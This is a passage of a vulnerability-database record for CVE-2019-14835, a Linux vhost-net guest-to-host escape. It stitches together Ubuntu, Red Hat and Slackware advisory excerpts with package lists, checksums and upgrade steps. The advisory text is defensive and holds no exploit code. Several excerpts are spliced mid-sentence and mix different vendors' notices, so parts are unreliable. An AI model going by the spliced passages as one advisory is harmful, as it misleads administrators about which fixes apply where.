|\n| 4.15.0-1045.50           | 58.1     | oem                      |\n| 4.15.0-1047.49           | 58.1     | aws                      |\n| 4.15.0-1047.51           | 58.1     | azure                    |\n| 4.15.0-1048.50           | 58.1     | aws                      |\n| 4.15.0-1049.54           | 58.1     | azure                    |\n| 4.15.0-1050.52           | 58.1     | aws                      |\n| 4.15.0-1050.55           | 58.1     | azure                    |\n| 4.15.0-1050.57           | 58.1     | oem                      |\n| 4.15.0-1051.53           | 58.1     | aws                      |\n| 4.15.0-1051.56           | 58.1     | azure                    |\n| 4.15.0-1052.57           | 58.1     | azure                    |\n| 4.15.0-1055.60           | 58.1     | azure                    |\n| 4.15.0-1056.61           | 58.1     | azure                    |\n| 4.15.0-1056.65           | 58.1     | oem                      |\n| 4.15.0-1057.62           | 58.1     | azure                    |\n| 4.15.0-1057.66           | 58.1     | oem                      |\n| 4.15.0-1059.64           | 58.1     | azure                    |\n| 5.0.0-1014.14~18.04.1    | 58.1     | azure                    |\n| 5.0.0-1016.17~18.04.1    | 58.1     | azure                    |\n| 5.0.0-1018.19~18.04.1    | 58.1     | azure                    |\n| 5.0.0-1020.21~18.04.1    | 58.1     | azure                    |\n\nSupport Information:\n\nKernels older than the levels listed below do not receive livepatch\nupdates. Please upgrade your kernel as soon as possible. \n\n| Series           | Version          | Flavors                  |\n|------------------+------------------+--------------------------|\n| Ubuntu 18.04 LTS | 4.15.0-1039      | aws                      |\n| Ubuntu 16.04 LTS | 4.4.0-1083       | aws                      |\n| Ubuntu 18.04 LTS | 5.0.0-1000       | azure                    |\n| Ubuntu 16.04 LTS | 4.15.0-1047      | azure                    |\n| Ubuntu 18.04 LTS | 4.15.0-50        | generic lowlatency       |\n| Ubuntu 16.04 LTS | 4.15.0-50        | generic lowlatency       |\n| Ubuntu 14.04 LTS | 4.4.0-148        | generic lowlatency       |\n| Ubuntu 18.04 LTS | 4.15.0-1038      | oem                      |\n| Ubuntu 16.04 LTS | 4.4.0-148        | generic lowlatency       |\n\nReferences:\n  CVE-2016-10905, CVE-2018-20856, CVE-2018-20961, CVE-2018-20976, \n  CVE-2018-21008, CVE-2019-0136, CVE-2019-2054, CVE-2019-2181, \n  CVE-2019-3846, CVE-2019-10126, CVE-2019-10207, CVE-2019-11477, \n  CVE-2019-11478, CVE-2019-11833, CVE-2019-12614, CVE-2019-14283, \n  CVE-2019-14284, CVE-2019-14814, CVE-2019-14815, CVE-2019-14816, \n  CVE-2019-14821, CVE-2019-14835\n\n\n-- \nubuntu-security-announce mailing list\nubuntu-security-announce@lists.ubuntu.com\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Important: kernel security update\nAdvisory ID:       RHSA-2019:2866-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2019:2866\nIssue date:        2019-09-23\nCVE Names:         CVE-2019-14835\n====================================================================\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7.5\nExtended Update Support. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux ComputeNode EUS (v. 7.5) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode Optional EUS (v. 7.5) - x86_64\nRed Hat Enterprise Linux Server EUS (v. 7.5) - noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional EUS (v. 7.5) - ppc64, ppc64le, x86_64\n\n3. \n(CVE-2019-14835)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1750727 - CVE-2019-14835 kernel: vhost-net: guest to host kernel escape during migration\n\n6. Package List:\n\nRed Hat Enterprise Linux ComputeNode EUS (v. 7.5):\n\nSource:\nkernel-3.10.0-862.41.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-862.41.2.el7.noarch.rpm\nkernel-doc-3.10.0-862.41.2.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debug-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-devel-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-headers-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-tools-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-862.41.2.el7.x86_64.rpm\nperf-3.10.0-862.41.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\npython-perf-3.10.0-862.41.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional EUS (v. 7.5):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-862.41.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server EUS (v. 7.5):\n\nSource:\nkernel-3.10.0-862.41.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-862.41.2.el7.noarch.rpm\nkernel-doc-3.10.0-862.41.2.el7.noarch.rpm\n\nppc64:\nkernel-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-bootwrapper-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-debug-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-debug-devel-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-devel-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-headers-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-tools-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-tools-libs-3.10.0-862.41.2.el7.ppc64.rpm\nperf-3.10.0-862.41.2.el7.ppc64.rpm\nperf-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm\npython-perf-3.10.0-862.41.2.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm\n\nppc64le:\nkernel-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-bootwrapper-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-debug-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-devel-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-headers-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-tools-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-tools-libs-3.10.0-862.41.2.el7.ppc64le.rpm\nperf-3.10.0-862.41.2.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm\npython-perf-3.10.0-862.41.2.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm\n\ns390x:\nkernel-3.10.0-862.41.2.el7.s390x.rpm\nkernel-debug-3.10.0-862.41.2.el7.s390x.rpm\nkernel-debug-debuginfo-3.10.0-862.41.2.el7.s390x.rpm\nkernel-debug-devel-3.10.0-862.41.2.el7.s390x.rpm\nkernel-debuginfo-3.10.0-862.41.2.el7.s390x.rpm\nkernel-debuginfo-common-s390x-3.10.0-862.41.2.el7.s390x.rpm\nkernel-devel-3.10.0-862.41.2.el7.s390x.rpm\nkernel-headers-3.10.0-862.41.2.el7.s390x.rpm\nkernel-kdump-3.10.0-862.41.2.el7.s390x.rpm\nkernel-kdump-debuginfo-3.10.0-862.41.2.el7.s390x.rpm\nkernel-kdump-devel-3.10.0-862.41.2.el7.s390x.rpm\nperf-3.10.0-862.41.2.el7.s390x.rpm\nperf-debuginfo-3.10.0-862.41.2.el7.s390x.rpm\npython-perf-3.10.0-862.41.2.el7.s390x.rpm\npython-perf-debuginfo-3.10.0-862.41.2.el7.s390x.rpm\n\nx86_64:\nkernel-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debug-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-devel-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-headers-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-tools-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-862.41.2.el7.x86_64.rpm\nperf-3.10.0-862.41.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\npython-perf-3.10.0-862.41.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional EUS (v. 7.5):\n\nppc64:\nkernel-debug-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-tools-libs-devel-3.10.0-862.41.2.el7.ppc64.rpm\nperf-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm\n\nppc64le:\nkernel-debug-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-debug-devel-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-tools-libs-devel-3.10.0-862.41.2.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-862.41.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2019-14835\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/security/vulnerabilities/kernel-vhost\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2019 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXYiswNzjgjWX9erEAQhd1g//WDRHc/Prfvv6JNbmMdvxJvpXZx3Wc535\n/AQUarXoBalyktM8ucRBOg28X4Eq7Y8WF9jbdoyp8iIrirZQdA7+4yEI6O6GnY2m\nM3sx6Kw9jbNFxP72zUxOK6hMuR8pimz0RWIdc8vQgfA3UuTyjjfvHjjr361FCRHF\nbjRgMl4sOuMbwrxs/h6NgeKVLUw5EoHTrJ6Hc8Vv5wIjyir1bSMH0aikAirkoZ0Y\nWtR3Z7lvODMcY4wKXecyVc/xslg1ioZhS9gGsG+TJ2fUMw7sZr5ERccc+1UWGFUa\n2knyaFEQUSEYweDEsYm3zR3G75rNljzX8VZaEN/ShQwIA46k8J/Z7Wdy7DC6e66/\nFUOKdD8MEjOieoDLfXZpOlBJ1UWBCC8/HYuP7ujFpiCvN7zFBd/HYAIUnhC+y5wg\nXHTc05QJbalfHAntTQRzlwS8Uc746PjBlykrWETVFwyVu3u1cfxbSYsP4TA/6yvE\nAUK1uea0hbg6RgaceZfyIV8YIaaJB5fmS4Ula4p4ppBf5HuF+L0eRl5zYzhA0Ryl\nNSNr5YeIrmCVr6UjEBNZlClSOwi4RN2pQ1VmAcbrsACYuOcKVD1PtoCH087ISIjP\nLej+FZxY423yc9s1/2RxoVIgYwInTzttvauDR8ws4bDmxbPzWrlpT7ciee5kdSQr\njZmQ2x5ylP4=z5bF\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n+--------------------------+\npatches/packages/linux-4.4.199/*:  Upgraded. \n  These updates fix various bugs and security issues. \n  If you use lilo to boot your machine, be sure lilo.conf points to the correct\n  kernel and initrd and run lilo as root to update the bootloader. \n  If you use elilo to boot your machine, you should run eliloconfig to copy the\n  kernel and initrd to the EFI System Partition. \n  For more information, see:\n    Fixed in 4.4.191:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3900\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15118\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10906\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10905\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10638\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15117\n    Fixed in 4.4.193:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14835\n    Fixed in 4.4.194:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14816\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14814\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15505\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14821\n    Fixed in 4.4.195:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17053\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17052\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17056\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17055\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17054\n    Fixed in 4.4.196:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2215\n    Fixed in 4.4.197:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16746\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20976\n    Fixed in 4.4.198:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17075\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17133\n    Fixed in 4.4.199:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15098\n  (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project!  :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-generic-4.4.199-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-generic-smp-4.4.199_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-headers-4.4.199_smp-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-huge-4.4.199-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-huge-smp-4.4.199_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-modules-4.4.199-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-modules-smp-4.4.199_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-source-4.4.199_smp-noarch-1.txz\n\nUpdated packages for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-generic-4.4.199-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-headers-4.4.199-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-huge-4.4.199-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-modules-4.4.199-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-source-4.4.199-noarch-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.2 packages:\n\n0e523f42e759ecc2399f36e37672f110  kernel-generic-4.4.199-i586-1.txz\nee6451f5362008b46fee2e08e3077b21  kernel-generic-smp-4.4.199_smp-i686-1.txz\na8338ef88f2e3ea9c74d564c36ccd420  kernel-headers-4.4.199_smp-x86-1.txz\ncd9e9c241e4eec2fba1dae658a28870e  kernel-huge-4.4.199-i586-1.txz\n842030890a424023817d42a83a86a7f4  kernel-huge-smp-4.4.199_smp-i686-1.txz\n257db024bb4501548ac9118dbd2d9ae6  kernel-modules-4.4.199-i586-1.txz\n96377cbaf7bca55aaca70358c63151a7  kernel-modules-smp-4.4.199_smp-i686-1.txz\n0673e86466f9e624964d95107cf6712f  kernel-source-4.4.199_smp-noarch-1.txz\n\nSlackware x86_64 14.2 packages:\n6d1ff428e7cad6caa8860acc402447a1  kernel-generic-4.4.199-x86_64-1.txz\ndadc091dc725b8227e0d1e35098d6416  kernel-headers-4.4.199-x86-1.txz\nf5f4c034203f44dd1513ad3504c42515  kernel-huge-4.4.199-x86_64-1.txz\na5337cd8b2ca80d4d93b9e9688e42b03  kernel-modules-4.4.199-x86_64-1.txz\n5dd6e46c04f37b97062dc9e52cc38add  kernel-source-4.4.199-noarch-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg kernel-*.txz\n\nIf you are using an initrd, you\u0027ll need to rebuild it. \n\nFor a 32-bit SMP machine, use this command (substitute the appropriate\nkernel version if you are not running Slackware 14.2):\n# /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.199-smp | bash\n\nFor a 64-bit machine, or a 32-bit uniprocessor machine, use this command\n(substitute the appropriate kernel version if you are not running\nSlackware 14.2):\n# /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.199 | bash\n\nPlease note that \"uniprocessor\" has to do with the kernel you are running,\nnot with the CPU. Most systems should run the SMP kernel (if they can)\nregardless of the number of cores the CPU has. If you aren\u0027t sure which\nkernel you are running, run \"uname -a\". If you see SMP there, you are\nrunning the SMP kernel and should use the 4.4.199-smp version when running\nmkinitrd_command_generator. Note that this is only for 32-bit -- 64-bit\nsystems should always use 4.4.199 as the version. \n\nIf you are using lilo or elilo to boot the machine, you\u0027ll need to ensure\nthat the machine is properly prepared before rebooting. \n\nIf using LILO:\nBy default, lilo.conf contains an image= line that references a symlink\nthat always points to the correct kernel. No editing should be required\nunless your machine uses a custom lilo.conf. If that is the case, be sure\nthat the image= line references the correct kernel file.  Either way,\nyou\u0027ll need to run \"lilo\" as root to reinstall the boot loader. \n\nIf using elilo:\nEnsure that the /boot/vmlinuz symlink is pointing to the kernel you wish\nto use, and then run eliloconfig to update the EFI System Partition. \n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list:                          |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message:                                                     |\n|                                                                        |\n|   unsubscribe slackware-security                                       |\n|                                                                        |\n| You will get a confirmation message back containing instructions to    |\n| complete the process.  Please do not reply to this email address. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. These packages include redhat-release-virtualization-host,\novirt-node, and rhev-hypervisor. RHVH features a Cockpit user\ninterface for monitoring the host\u0027s resources and performing administrative\ntasks. \n\nThe following packages have been upgraded to a later upstream version:\nredhat-release-virtualization-host (4.2), redhat-virtualization-host (4.2). (CVE-2019-15031)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 ESM:\n  linux-image-3.13.0-173-generic  3.13.0-173.224\n  linux-image-3.13.0-173-generic-lpae  3.13.0-173.224\n  linux-image-3.13.0-173-lowlatency  3.13.0-173.224\n  linux-image-3.13.0-173-powerpc-e500  3.13.0-173.224\n  linux-image-3.13.0-173-powerpc-e500mc  3.13.0-173.224\n  linux-image-3.13.0-173-powerpc-smp  3.13.0-173.224\n  linux-image-3.13.0-173-powerpc64-emb  3.13.0-173.224\n  linux-image-3.13.0-173-powerpc64-smp  3.13.0-173.224\n  linux-image-4.15.0-1059-azure   4.15.0-1059.64~14.04.1\n  linux-image-4.4.0-1054-aws      4.4.0-1054.58\n  linux-image-4.4.0-164-generic   4.4.0-164.192~14.04.1\n  linux-image-4.4.0-164-generic-lpae  4.4.0-164.192~14.04.1\n  linux-image-4.4.0-164-lowlatency  4.4.0-164.192~14.04.1\n  linux-image-4.4.0-164-powerpc-e500mc  4.4.0-164.192~14.04.1\n  linux-image-4.4.0-164-powerpc-smp  4.4.0-164.192~14.04.1\n  linux-image-4.4.0-164-powerpc64-emb  4.4.0-164.192~14.04.1\n  linux-image-4.4.0-164-powerpc64-smp  4.4.0-164.192~14.04.1\n  linux-image-aws                 4.4.0.1054.55\n  linux-image-azure               4.15.0.1059.45\n  linux-image-generic             3.13.0.173.184\n  linux-image-generic-lpae        3.13.0.173.184\n  linux-image-generic-lpae-lts-xenial  4.4.0.164.143\n  linux-image-generic-lts-xenial  4.4.0.164.143\n  linux-image-lowlatency          3.13.0.173.184\n  linux-image-lowlatency-lts-xenial  4.4.0.164.143\n  linux-image-powerpc-e500        3.13.0.173.184\n  linux-image-powerpc-e500mc      3.13.0.173.184\n  linux-image-powerpc-e500mc-lts-xenial  4.4.0.164.143\n  linux-image-powerpc-smp         3.13.0.173.184\n  linux-image-powerpc-smp-lts-xenial  4.4.0.164.143\n  linux-image-powerpc64-emb       3.13.0.173.184\n  linux-image-powerpc64-emb-lts-xenial  4.4.0.164.143\n  linux-image-powerpc64-smp       3.13.0.173.184\n  linux-image-powerpc64-smp-lts-xenial  4.4.0.164.143\n  linux-image-server              3.13.0.173.184\n  linux-image-virtual             3.13.0.173.184\n  linux-image-virtual-lts-xenial  4.4.0.164.143\n\nUbuntu 12.04 ESM:\n  linux-image-3.13.0-173-generic  3.13.0-173.224~12.04.1\n  linux-image-3.13.0-173-generic-lpae  3.13.0-173.224~12.04.1\n  linux-image-3.13.0-173-lowlatency  3.13.0-173.224~12.04.1\n  linux-image-3.2.0-143-generic   3.2.0-143.190\n  linux-image-3.2.0-143-generic-pae  3.2.0-143.190\n  linux-image-3.2.0-143-highbank  3.2.0-143.190\n  linux-image-3.2.0-143-omap      3.2.0-143.190\n  linux-image-3.2.0-143-powerpc-smp  3.2.0-143.190\n  linux-image-3.2.0-143-powerpc64-smp  3.2.0-143.190\n  linux-image-3.2.0-143-virtual   3.2.0-143.190\n  linux-image-generic             3.2.0.143.158\n  linux-image-generic-lpae-lts-trusty  3.13.0.173.161\n  linux-image-generic-lts-trusty  3.13.0.173.161\n  linux-image-generic-pae         3.2.0.143.158\n  linux-image-highbank            3.2.0.143.158\n  linux-image-omap                3.2.0.143.158\n  linux-image-powerpc             3.2.0.143.158\n  linux-image-powerpc-smp         3.2.0.143.158\n  linux-image-powerpc64-smp       3.2.0.143.158\n  linux-image-server              3.2.0.143.158\n  linux-image-virtual             3.2.0.143.158\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. 7) - noarch, x86_64\n\n3",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-14835"
      },
      {
        "db": "VULHUB",
        "id": "VHN-146821"
      },
      {
        "db": "PACKETSTORM",
        "id": "154514"
      },
      {
        "db": "PACKETSTORM",
        "id": "154602"
      },
      {
        "db": "PACKETSTORM",
        "id": "154951"
      },
      {
        "db": "PACKETSTORM",
        "id": "154565"
      },
      {
        "db": "PACKETSTORM",
        "id": "155212"
      },
      {
        "db": "PACKETSTORM",
        "id": "154538"
      },
      {
        "db": "PACKETSTORM",
        "id": "154659"
      },
      {
        "db": "PACKETSTORM",
        "id": "154513"
      },
      {
        "db": "PACKETSTORM",
        "id": "154572"
      },
      {
        "db": "PACKETSTORM",
        "id": "154540"
      }
    ],
    "trust": 1.89
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-14835",
        "trust": 2.1
      },
      {
        "db": "PACKETSTORM",
        "id": "155212",
        "trust": 1.2
      },
      {
        "db": "PACKETSTORM",
        "id": "154951",
        "trust": 1.2
      },
      {
        "db": "PACKETSTORM",
        "id": "154572",
        "trust": 1.2
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/10/03/1",
        "trust": 1.1
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/10/09/7",
        "trust": 1.1
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/09/24/1",
        "trust": 1.1
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/10/09/3",
        "trust": 1.1
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/09/17/1",
        "trust": 1.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154538",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "154513",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "154602",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "154514",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "154540",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "154565",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "154659",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "154539",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154570",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154562",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154566",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154563",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154564",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154541",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154558",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154585",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154569",
        "trust": 0.1
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201909-807",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-146821",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-146821"
      },
      {
        "db": "PACKETSTORM",
        "id": "154514"
